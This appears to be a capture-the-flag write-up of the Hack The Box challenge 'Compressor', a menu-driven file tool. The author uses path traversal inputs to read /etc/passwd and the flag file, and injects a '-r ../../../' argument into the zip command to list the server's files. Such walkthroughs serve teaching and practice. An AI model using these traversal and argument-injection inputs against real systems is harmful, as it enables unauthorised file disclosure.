Compressor
So we are given an endpoint we can netcat
into and it presents us with the following:
Compressor
[*] Directory to work in: QqcbsvCcKGxpk7n6JNvqNxPB19gC5OiB
Component List:
+===============+
| |
| 1. Head 🤖 |
| 2. Torso 🦴 |
| 3. Hands 💪 |
| 4. Legs 🦵 |
| |
+===============+
[*] Choose component: 1
[*] Sub-directory to work in: QqcbsvCcKGxpk7n6JNvqNxPB19gC5OiB/Head
Actions:
Create artifact
List directory (pwd; ls -la)
Read artifact (cat ./)
Compress artifact (zip .zip )
Change directory (cd )
Clean directory (rm -rf ./*)
Exit
Let’s try reading an artifact and passing it something they didn’t intend
[*] Choose action: 3
Insert name you want to read: ../../../../etc/passwd
root:x:0:0:root:/root:/bin/ash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
...
ctf:x:1000:1000:1000:/home/ctf:/bin/sh
Great, so we can read arbitrary files!
Actions:
Create artifact
List directory (pwd; ls -la)
Read artifact (cat ./)
Compress artifact (zip .zip )
Change directory (cd )
Clean directory (rm -rf ./*)
Exit
[*] Choose action: 1
Insert name: ../
Insert content: #!/bin/bash
Traceback (most recent call last):
File "/home/ctf/artifacts.py", line 104, in
create_file()
File "/home/ctf/artifacts.py", line 74, in create_file
f = open(fname, "a")
IsADirectoryError: [Errno 21] Is a directory: '../'
Actions:
Create artifact
List directory (pwd; ls -la)
Read artifact (cat ./)
Compress artifact (zip .zip )
Change directory (cd )
Clean directory (rm -rf ./*)
Exit
So first thought after this was since we can access filepaths seemingly indiscriminately, lets trying zipping them all up together
[*] Choose action: 4
Insert .zip: test.zip
Insert : test
Insert : -r ../../../
adding: test (stored 0%)
adding: ../../../ (stored 0%)
adding: ../../../ctf/ (stored 0%)
adding: ../../../ctf/68ubJQ7pIAFQ3AR5XmnIIyNFlMKU5EXd/ (stored 0%)
adding: ../../../ctf/68ubJQ7pIAFQ3AR5XmnIIyNFlMKU5EXd/Head/ (stored 0%)
adding: ../../../ctf/68ubJQ7pIAFQ3AR5XmnIIyNFlMKU5EXd/Hands/ (stored 0%)
adding: ../../../ctf/68ubJQ7pIAFQ3AR5XmnIIyNFlMKU5EXd/Torso/ (stored 0%)
...
adding: ../../../ctf/F9mZ4CfUW9NVXjEwShKzvoNYhq7DNwIb/Torso/ (stored 0%)
adding: ../../../ctf/F9mZ4CfUW9NVXjEwShKzvoNYhq7DNwIb/Legs/ (stored 0%)
adding: ../../../ctf/artifacts.py (deflated 63%)
adding: ../../../ctf/clear.py (deflated 32%)
adding: ../../../ctf/flag.txt (stored 0%)
Actions:
and since it pastes the output we now know where the flag is!
Create artifact
List directory (pwd; ls -la)
Read artifact (cat ./)
Compress artifact (zip .zip )
Change directory (cd )
Clean directory (rm -rf ./*)
Exit
[*] Choose action: 3
Insert name you want to read: ../../../ctf/flag.txt
HTB{GTFO_4nd_m4k3_th3_b35t_4rt1f4ct5}
Flag: HTB{GTFO_4nd_m4k3_th3_b35t_4rt1f4ct5}